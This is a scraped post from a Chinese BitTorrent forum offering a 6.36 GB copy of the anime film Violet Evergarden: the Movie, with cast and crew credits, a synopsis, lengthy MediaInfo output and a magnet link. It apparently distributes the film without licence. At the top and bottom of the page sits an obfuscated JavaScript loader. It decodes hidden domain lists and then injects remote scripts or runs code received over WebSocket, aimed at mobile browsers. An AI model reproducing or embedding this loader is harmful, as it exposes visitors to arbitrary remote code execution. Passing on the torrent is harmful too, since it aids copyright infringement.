紫罗兰永恒花园 剧场版[中文字幕].Violet.Evergarden.the.Movie.2020.1080p.NF.WEB-DL.DDP5.1.x264 6.36GB

版主小s 1月前 184

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 紫罗兰永恒花园 剧场版 / 紫罗兰永恒花园 电影版 / Violet Evergarden: the Movie

◎片 名 劇場版 ヴァイオレット?エヴァーガーデン

◎年 代 2020

◎产 地 日本

◎类 别 剧情 / 爱情 / 动画 / 奇幻

◎语 言 日语

◎上映日期 2021(中国大陆) / 2020-09-18(日本) / 2021-10-13(美国网络)

◎IMDb链接 https://www.imdb.com/title/tt8652818/

◎豆瓣评分 8.1/10 (5043人评价)

◎豆瓣链接 https://movie.douban.com/subject/30179560/

◎片 长 140分钟

◎导 演 石立太一 Ishidate Taichi (id:1386131)

◎编 剧 晓佳奈 Kana Akatsuki (id:1386928)

吉田玲子 Reiko Yoshida (id:1275219)

◎演 员 石川由依 Yui Ishikawa (id:1329107)

浪川大辅 Daisuke Namikawa (id:1001127)

子安武人 Takehito Koyasu (id:1054354)

木内秀信 Hidenobu Kiuchi (id:1006385)

户松遥 Haruka Tomatsu (id:1006707)

内山昂辉 Koki Uchiyama (id:1312902)

远藤绫 Aya End? (id:1008446)

茅原实里 Minori Chihara (id:1042757)

水桥香织 Kaori Mizuhashi (id:1051936)

佐藤利奈 Rina Satou (id:1241851)

松元惠 Megumi Matsumoto (id:1318671)

诸星堇 Sumire Morohoshi (id:1319649)

中田让治 J?ji Nakata (id:1048500)

间宫康弘 Yasuhiro Mamiya (id:1376228)

宫本充 Mitsuru Miyamoto (id:1052033)

筱原惠美 Emi Shinohara (id:1025715)

京田尚子 Hisako Ky?da (id:1035702)

引坂理绘 Rie Hikisaka (id:1409730)

川澄绫子 Ayako Kawasumi (id:1003583)

埃文·考尔 Evan Call (id:1408415)

唐泽美帆 Miho Karasawa (id:1462095)

鹤冈阳太 Tsuruoka Youta (id:1436377)

◎标 签 京阿尼 / 剧场版 / 动漫 / 二次元 / 日本动画 / 日本 / 温情 / 动画电影

◎简 介

延续TV版的主线剧情,继续讲述从战场回来的少女薇尔莉特·伊芙加登为了理解“爱”的含义而从事为有需要的人们写信传情的工作。薇妹一直挂念的少佐的下落大概率会在这部剧场版中讲述。

◎获奖情况 (共1项)

第44届日本电影学院奖 (2021)

最佳动画片(提名)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 127643512214906593614932960145571403972 (0x60073F09768A4E705A481FFF16D958C4)

  4. Complete name : Vio[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 6.35 GiB

  8. Duration : 2 h 20 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 6 485 kb/s

  11. Encoded date : UTC 2021-10-14 07:29:52

  12. Writing application : mkvmerge v44.0.0 ('Domino') 64-bit

  13. Writing library : libebml v1.3.10 + libmatroska v1.5.2


  14. Video

  15. ID : 1

  16. Format : AVC

  17. Format/Info : Advanced Video Codec

  18. Format profile : [email protected]

  19. Format settings : CABAC / 3 Ref Frames

  20. Format settings, CABAC : Yes

  21. Format settings, Reference frames : 3 frames

  22. Codec ID : V_MPEG4/ISO/AVC

  23. Duration : 2 h 20 min

  24. Bit rate mode : Variable

  25. Bit rate : 1 425 kb/s

  26. Maximum bit rate : 2 940 kb/s

  27. Width : 1 920 pixels

  28. Height : 1 080 pixels

  29. Display aspect ratio : 16:9

  30. Frame rate mode : Constant

  31. Frame rate : 24.000 FPS

  32. Color space : YUV

  33. Chroma subsampling : 4:2:0

  34. Bit depth : 8 bits

  35. Scan type : Progressive

  36. Bits/(Pixel*Frame) : 0.029

  37. Stream size : 1.33 GiB (21%)

  38. Writing library : x264 core 148 r2722 1b0121b

  39. Encoding settings : cabac=1 / ref=3 / deblock=1:0:0 / analyse=0x1:0x111 / me=umh / subme=10 / psy=1 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=24 / chroma_me=1 / trellis=2 / 8x8dct=0 / cqm=0 / deadzone=21,11 / fast_pskip=1 / chroma_qp_offset=-2 / threads=6 / lookahead_threads=1 / sliced_threads=0 / nr=0 / decimate=1 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / stitchable=1 / constrained_intra=0 / bframes=2 / b_pyramid=0 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=250 / keyint_min=24 / scenecut=0 / intra_refresh=0 / rc_lookahead=48 / rc=2pass / mbtree=1 / bitrate=1425 / ratetol=1.0 / qcomp=0.50 / qpmin=6 / qpmax=51 / qpstep=4 / cplxblur=20.0 / qblur=0.5 / vbv_maxrate=2940 / vbv_bufsize=3920 / nal_hrd=vbr / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / aq=1:1.00

  40. Default : Yes

  41. Forced : No


  42. Audio #1

  43. ID : 2

  44. Format : E-AC-3

  45. Format/Info : Enhanced AC-3

  46. Commercial name : Dolby Digital Plus

  47. Codec ID : A_EAC3

  48. Duration : 2 h 20 min

  49. Bit rate mode : Constant

  50. Bit rate : 640 kb/s

  51. Channel(s) : 6 channels

  52. Channel layout : L R C LFE Ls Rs

  53. Sampling rate : 48.0 kHz

  54. Frame rate : 31.250 FPS (1536 SPF)

  55. Compression mode : Lossy

  56. Stream size : 642 MiB (10%)

  57. Title : Japanese

  58. Language : Japanese

  59. Service kind : Complete Main

  60. Default : Yes

  61. Forced : No


  62. Audio #2

  63. ID : 3

  64. Format : E-AC-3

  65. Format/Info : Enhanced AC-3

  66. Commercial name : Dolby Digital Plus

  67. Codec ID : A_EAC3

  68. Duration : 2 h 20 min

  69. Bit rate mode : Constant

  70. Bit rate : 640 kb/s

  71. Channel(s) : 6 channels

  72. Channel layout : L R C LFE Ls Rs

  73. Sampling rate : 48.0 kHz

  74. Frame rate : 31.250 FPS (1536 SPF)

  75. Compression mode : Lossy

  76. Stream size : 642 MiB (10%)

  77. Title : English

  78. Language : English

  79. Service kind : Complete Main

  80. Default : No

  81. Forced : No


  82. Audio #3

  83. ID : 4

  84. Format : E-AC-3

  85. Format/Info : Enhanced AC-3

  86. Commercial name : Dolby Digital Plus

  87. Codec ID : A_EAC3

  88. Duration : 2 h 20 min

  89. Bit rate mode : Constant

  90. Bit rate : 640 kb/s

  91. Channel(s) : 6 channels

  92. Channel layout : L R C LFE Ls Rs

  93. Sampling rate : 48.0 kHz

  94. Frame rate : 31.250 FPS (1536 SPF)

  95. Compression mode : Lossy

  96. Stream size : 642 MiB (10%)

  97. Title : French

  98. Language : French

  99. Service kind : Complete Main

  100. Default : No

  101. Forced : No


  102. Audio #4

  103. ID : 5

  104. Format : E-AC-3

  105. Format/Info : Enhanced AC-3

  106. Commercial name : Dolby Digital Plus

  107. Codec ID : A_EAC3

  108. Duration : 2 h 20 min

  109. Bit rate mode : Constant

  110. Bit rate : 640 kb/s

  111. Channel(s) : 6 channels

  112. Channel layout : L R C LFE Ls Rs

  113. Sampling rate : 48.0 kHz

  114. Frame rate : 31.250 FPS (1536 SPF)

  115. Compression mode : Lossy

  116. Stream size : 642 MiB (10%)

  117. Title : German

  118. Language : German

  119. Service kind : Complete Main

  120. Default : No

  121. Forced : No


  122. Audio #5

  123. ID : 6

  124. Format : E-AC-3

  125. Format/Info : Enhanced AC-3

  126. Commercial name : Dolby Digital Plus

  127. Codec ID : A_EAC3

  128. Duration : 2 h 20 min

  129. Bit rate mode : Constant

  130. Bit rate : 640 kb/s

  131. Channel(s) : 6 channels

  132. Channel layout : L R C LFE Ls Rs

  133. Sampling rate : 48.0 kHz

  134. Frame rate : 31.250 FPS (1536 SPF)

  135. Compression mode : Lossy

  136. Stream size : 642 MiB (10%)

  137. Title : Italian

  138. Language : Italian

  139. Service kind : Complete Main

  140. Default : No

  141. Forced : No


  142. Audio #6

  143. ID : 7

  144. Format : E-AC-3

  145. Format/Info : Enhanced AC-3

  146. Commercial name : Dolby Digital Plus

  147. Codec ID : A_EAC3

  148. Duration : 2 h 20 min

  149. Bit rate mode : Constant

  150. Bit rate : 640 kb/s

  151. Channel(s) : 6 channels

  152. Channel layout : L R C LFE Ls Rs

  153. Sampling rate : 48.0 kHz

  154. Frame rate : 31.250 FPS (1536 SPF)

  155. Compression mode : Lossy

  156. Stream size : 642 MiB (10%)

  157. Title : Brazilian Portuguese

  158. Language : Portuguese

  159. Service kind : Complete Main

  160. Default : No

  161. Forced : No


  162. Audio #7

  163. ID : 8

  164. Format : E-AC-3

  165. Format/Info : Enhanced AC-3

  166. Commercial name : Dolby Digital Plus

  167. Codec ID : A_EAC3

  168. Duration : 2 h 20 min

  169. Bit rate mode : Constant

  170. Bit rate : 640 kb/s

  171. Channel(s) : 6 channels

  172. Channel layout : L R C LFE Ls Rs

  173. Sampling rate : 48.0 kHz

  174. Frame rate : 31.250 FPS (1536 SPF)

  175. Compression mode : Lossy

  176. Stream size : 642 MiB (10%)

  177. Title : Spanish

  178. Language : Spanish

  179. Service kind : Complete Main

  180. Default : No

  181. Forced : No


  182. Audio #8

  183. ID : 9

  184. Format : E-AC-3

  185. Format/Info : Enhanced AC-3

  186. Commercial name : Dolby Digital Plus

  187. Codec ID : A_EAC3

  188. Duration : 2 h 20 min

  189. Bit rate mode : Constant

  190. Bit rate : 640 kb/s

  191. Channel(s) : 6 channels

  192. Channel layout : L R C LFE Ls Rs

  193. Sampling rate : 48.0 kHz

  194. Frame rate : 31.250 FPS (1536 SPF)

  195. Compression mode : Lossy

  196. Stream size : 642 MiB (10%)

  197. Title : European Spanish

  198. Language : Spanish

  199. Service kind : Complete Main

  200. Default : No

  201. Forced : No


  202. Text #1

  203. ID : 10

  204. Format : UTF-8

  205. Codec ID : S_TEXT/UTF8

  206. Codec ID/Info : UTF-8 Plain Text

  207. Duration : 2 h 19 min

  208. Bit rate : 36 b/s

  209. Count of elements : 1414

  210. Stream size : 37.1 KiB (0%)

  211. Title : English

  212. Language : English

  213. Default : Yes

  214. Forced : No


  215. Text #2

  216. ID : 11

  217. Format : UTF-8

  218. Codec ID : S_TEXT/UTF8

  219. Codec ID/Info : UTF-8 Plain Text

  220. Duration : 2 h 17 min

  221. Bit rate : 58 b/s

  222. Count of elements : 1276

  223. Stream size : 58.5 KiB (0%)

  224. Title : Arabic

  225. Language : Arabic

  226. Default : No

  227. Forced : No


  228. Text #3

  229. ID : 12

  230. Format : UTF-8

  231. Codec ID : S_TEXT/UTF8

  232. Codec ID/Info : UTF-8 Plain Text

  233. Duration : 2 h 17 min

  234. Bit rate : 31 b/s

  235. Count of elements : 1291

  236. Stream size : 31.8 KiB (0%)

  237. Title : Chinese Simplified

  238. Language : Chinese

  239. Default : No

  240. Forced : No


  241. Text #4

  242. ID : 13

  243. Format : UTF-8

  244. Codec ID : S_TEXT/UTF8

  245. Codec ID/Info : UTF-8 Plain Text

  246. Duration : 2 h 17 min

  247. Bit rate : 32 b/s

  248. Count of elements : 1324

  249. Stream size : 33.0 KiB (0%)

  250. Title : Chinese Traditional

  251. Language : Chinese

  252. Default : No

  253. Forced : No


  254. Text #5

  255. ID : 14

  256. Format : UTF-8

  257. Codec ID : S_TEXT/UTF8

  258. Codec ID/Info : UTF-8 Plain Text

  259. Duration : 2 h 18 min

  260. Bit rate : 34 b/s

  261. Count of elements : 1280

  262. Stream size : 35.3 KiB (0%)

  263. Title : Croatian

  264. Language : Croatian

  265. Default : No

  266. Forced : No


  267. Text #6

  268. ID : 15

  269. Format : UTF-8

  270. Codec ID : S_TEXT/UTF8

  271. Codec ID/Info : UTF-8 Plain Text

  272. Duration : 2 h 17 min

  273. Bit rate : 35 b/s

  274. Count of elements : 1287

  275. Stream size : 35.5 KiB (0%)

  276. Title : Czech

  277. Language : Czech

  278. Default : No

  279. Forced : No


  280. Text #7

  281. ID : 16

  282. Format : UTF-8

  283. Codec ID : S_TEXT/UTF8

  284. Codec ID/Info : UTF-8 Plain Text

  285. Duration : 2 h 18 min

  286. Bit rate : 38 b/s

  287. Count of elements : 1253

  288. Stream size : 38.8 KiB (0%)

  289. Title : Danish

  290. Language : Danish

  291. Default : No

  292. Forced : No


  293. Text #8

  294. ID : 17

  295. Format : UTF-8

  296. Codec ID : S_TEXT/UTF8

  297. Codec ID/Info : UTF-8 Plain Text

  298. Duration : 2 h 17 min

  299. Bit rate : 36 b/s

  300. Count of elements : 1249

  301. Stream size : 36.8 KiB (0%)

  302. Title : Dutch

  303. Language : Dutch

  304. Default : No

  305. Forced : No


  306. Text #9

  307. ID : 18

  308. Format : UTF-8

  309. Codec ID : S_TEXT/UTF8

  310. Codec ID/Info : UTF-8 Plain Text

  311. Duration : 2 h 17 min

  312. Bit rate : 37 b/s

  313. Count of elements : 1207

  314. Stream size : 37.8 KiB (0%)

  315. Title : Finnish

  316. Language : Finnish

  317. Default : No

  318. Forced : No


  319. Text #10

  320. ID : 19

  321. Format : UTF-8

  322. Codec ID : S_TEXT/UTF8

  323. Codec ID/Info : UTF-8 Plain Text

  324. Duration : 2 h 18 min

  325. Bit rate : 39 b/s

  326. Count of elements : 1322

  327. Stream size : 40.1 KiB (0%)

  328. Title : French

  329. Language : French

  330. Default : No

  331. Forced : No


  332. Text #11

  333. ID : 20

  334. Format : UTF-8

  335. Codec ID : S_TEXT/UTF8

  336. Codec ID/Info : UTF-8 Plain Text

  337. Duration : 2 h 18 min

  338. Bit rate : 42 b/s

  339. Count of elements : 1267

  340. Stream size : 43.2 KiB (0%)

  341. Title : German

  342. Language : German

  343. Default : No

  344. Forced : No


  345. Text #12

  346. ID : 21

  347. Format : UTF-8

  348. Codec ID : S_TEXT/UTF8

  349. Codec ID/Info : UTF-8 Plain Text

  350. Duration : 2 h 18 min

  351. Bit rate : 63 b/s

  352. Count of elements : 1307

  353. Stream size : 64.3 KiB (0%)

  354. Title : Greek

  355. Language : Greek

  356. Default : No

  357. Forced : No


  358. Text #13

  359. ID : 22

  360. Format : UTF-8

  361. Codec ID : S_TEXT/UTF8

  362. Codec ID/Info : UTF-8 Plain Text

  363. Duration : 2 h 17 min

  364. Bit rate : 54 b/s

  365. Count of elements : 1296

  366. Stream size : 54.6 KiB (0%)

  367. Title : Hebrew

  368. Language : Hebrew

  369. Default : No

  370. Forced : No


  371. Text #14

  372. ID : 23

  373. Format : UTF-8

  374. Codec ID : S_TEXT/UTF8

  375. Codec ID/Info : UTF-8 Plain Text

  376. Duration : 2 h 18 min

  377. Bit rate : 35 b/s

  378. Count of elements : 1190

  379. Stream size : 36.4 KiB (0%)

  380. Title : Hungarian

  381. Language : Hungarian

  382. Default : No

  383. Forced : No


  384. Text #15

  385. ID : 24

  386. Format : UTF-8

  387. Codec ID : S_TEXT/UTF8

  388. Codec ID/Info : UTF-8 Plain Text

  389. Duration : 2 h 17 min

  390. Bit rate : 36 b/s

  391. Count of elements : 1298

  392. Stream size : 37.2 KiB (0%)

  393. Title : Indonesian

  394. Language : Indonesian

  395. Default : No

  396. Forced : No


  397. Text #16

  398. ID : 25

  399. Format : UTF-8

  400. Codec ID : S_TEXT/UTF8

  401. Codec ID/Info : UTF-8 Plain Text

  402. Duration : 2 h 18 min

  403. Bit rate : 34 b/s

  404. Count of elements : 1279

  405. Stream size : 35.2 KiB (0%)

  406. Title : Italian

  407. Language : Italian

  408. Default : No

  409. Forced : No


  410. Text #17

  411. ID : 26

  412. Format : UTF-8

  413. Codec ID : S_TEXT/UTF8

  414. Codec ID/Info : UTF-8 Plain Text

  415. Duration : 2 h 18 min

  416. Bit rate : 56 b/s

  417. Count of elements : 1469

  418. Stream size : 56.9 KiB (0%)

  419. Title : Japanese

  420. Language : Japanese

  421. Default : No

  422. Forced : No


  423. Text #18

  424. ID : 27

  425. Format : UTF-8

  426. Codec ID : S_TEXT/UTF8

  427. Codec ID/Info : UTF-8 Plain Text

  428. Duration : 2 h 17 min

  429. Bit rate : 38 b/s

  430. Count of elements : 1324

  431. Stream size : 38.8 KiB (0%)

  432. Title : Korean

  433. Language : Korean

  434. Default : No

  435. Forced : No


  436. Text #19

  437. ID : 28

  438. Format : UTF-8

  439. Codec ID : S_TEXT/UTF8

  440. Codec ID/Info : UTF-8 Plain Text

  441. Duration : 2 h 18 min

  442. Bit rate : 39 b/s

  443. Count of elements : 1288

  444. Stream size : 39.7 KiB (0%)

  445. Title : Malay

  446. Language : Malay

  447. Default : No

  448. Forced : No


  449. Text #20

  450. ID : 29

  451. Format : UTF-8

  452. Codec ID : S_TEXT/UTF8

  453. Codec ID/Info : UTF-8 Plain Text

  454. Duration : 2 h 17 min

  455. Bit rate : 35 b/s

  456. Count of elements : 1110

  457. Stream size : 35.3 KiB (0%)

  458. Title : Norwegian Bokmal

  459. Language : Norwegian Bokmal

  460. Default : No

  461. Forced : No


  462. Text #21

  463. ID : 30

  464. Format : UTF-8

  465. Codec ID : S_TEXT/UTF8

  466. Codec ID/Info : UTF-8 Plain Text

  467. Duration : 2 h 9 min

  468. Bit rate : 36 b/s

  469. Count of elements : 1260

  470. Stream size : 34.7 KiB (0%)

  471. Title : Polish

  472. Language : Polish

  473. Default : No

  474. Forced : No


  475. Text #22

  476. ID : 31

  477. Format : UTF-8

  478. Codec ID : S_TEXT/UTF8

  479. Codec ID/Info : UTF-8 Plain Text

  480. Duration : 2 h 17 min

  481. Bit rate : 34 b/s

  482. Count of elements : 1382

  483. Stream size : 34.8 KiB (0%)

  484. Title : Portuguese

  485. Language : Portuguese

  486. Default : No

  487. Forced : No


  488. Text #23

  489. ID : 32

  490. Format : UTF-8

  491. Codec ID : S_TEXT/UTF8

  492. Codec ID/Info : UTF-8 Plain Text

  493. Duration : 2 h 17 min

  494. Bit rate : 37 b/s

  495. Count of elements : 1287

  496. Stream size : 37.4 KiB (0%)

  497. Title : Brazilian Portuguese

  498. Language : Portuguese

  499. Default : No

  500. Forced : No


  501. Text #24

  502. ID : 33

  503. Format : UTF-8

  504. Codec ID : S_TEXT/UTF8

  505. Codec ID/Info : UTF-8 Plain Text

  506. Duration : 2 h 17 min

  507. Bit rate : 36 b/s

  508. Count of elements : 1399

  509. Stream size : 36.7 KiB (0%)

  510. Title : Romanian

  511. Language : Romanian

  512. Default : No

  513. Forced : No


  514. Text #25

  515. ID : 34

  516. Format : UTF-8

  517. Codec ID : S_TEXT/UTF8

  518. Codec ID/Info : UTF-8 Plain Text

  519. Duration : 2 h 17 min

  520. Bit rate : 59 b/s

  521. Count of elements : 1287

  522. Stream size : 60.2 KiB (0%)

  523. Title : Russian

  524. Language : Russian

  525. Default : No

  526. Forced : No


  527. Text #26

  528. ID : 35

  529. Format : UTF-8

  530. Codec ID : S_TEXT/UTF8

  531. Codec ID/Info : UTF-8 Plain Text

  532. Duration : 2 h 17 min

  533. Bit rate : 36 b/s

  534. Count of elements : 1281

  535. Stream size : 36.3 KiB (0%)

  536. Title : Spanish

  537. Language : Spanish

  538. Default : No

  539. Forced : No


  540. Text #27

  541. ID : 36

  542. Format : UTF-8

  543. Codec ID : S_TEXT/UTF8

  544. Codec ID/Info : UTF-8 Plain Text

  545. Duration : 2 h 19 min

  546. Bit rate : 34 b/s

  547. Count of elements : 1353

  548. Stream size : 34.7 KiB (0%)

  549. Title : European Spanish

  550. Language : Spanish

  551. Default : No

  552. Forced : No


  553. Text #28

  554. ID : 37

  555. Format : UTF-8

  556. Codec ID : S_TEXT/UTF8

  557. Codec ID/Info : UTF-8 Plain Text

  558. Duration : 2 h 17 min

  559. Bit rate : 37 b/s

  560. Count of elements : 1251

  561. Stream size : 37.7 KiB (0%)

  562. Title : Swedish

  563. Language : Swedish

  564. Default : No

  565. Forced : No


  566. Text #29

  567. ID : 38

  568. Format : UTF-8

  569. Codec ID : S_TEXT/UTF8

  570. Codec ID/Info : UTF-8 Plain Text

  571. Duration : 2 h 17 min

  572. Bit rate : 92 b/s

  573. Count of elements : 1312

  574. Stream size : 93.8 KiB (0%)

  575. Title : Thai

  576. Language : Thai

  577. Default : No

  578. Forced : No


  579. Text #30

  580. ID : 39

  581. Format : UTF-8

  582. Codec ID : S_TEXT/UTF8

  583. Codec ID/Info : UTF-8 Plain Text

  584. Duration : 2 h 17 min

  585. Bit rate : 36 b/s

  586. Count of elements : 1268

  587. Stream size : 36.9 KiB (0%)

  588. Title : Turkish

  589. Language : Turkish

  590. Default : No

  591. Forced : No


  592. Text #31

  593. ID : 40

  594. Format : UTF-8

  595. Codec ID : S_TEXT/UTF8

  596. Codec ID/Info : UTF-8 Plain Text

  597. Duration : 2 h 18 min

  598. Bit rate : 60 b/s

  599. Count of elements : 1292

  600. Stream size : 62.0 KiB (0%)

  601. Title : Ukrainian

  602. Language : Ukrainian

  603. Default : No

  604. Forced : No


  605. Text #32

  606. ID : 41

  607. Format : UTF-8

  608. Codec ID : S_TEXT/UTF8

  609. Codec ID/Info : UTF-8 Plain Text

  610. Duration : 2 h 17 min

  611. Bit rate : 45 b/s

  612. Count of elements : 1296

  613. Stream size : 46.0 KiB (0%)

  614. Title : Vietnamese

  615. Language : Vietnamese

  616. Default : No

  617. Forced : No




复制代码


TAGS 奇幻 剧情 动画 爱情

磁力链:
  • magnet:?xt=urn:btih:E1BFDA9A3D5DB5096F48A9FFA94572D7083C4CE7

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};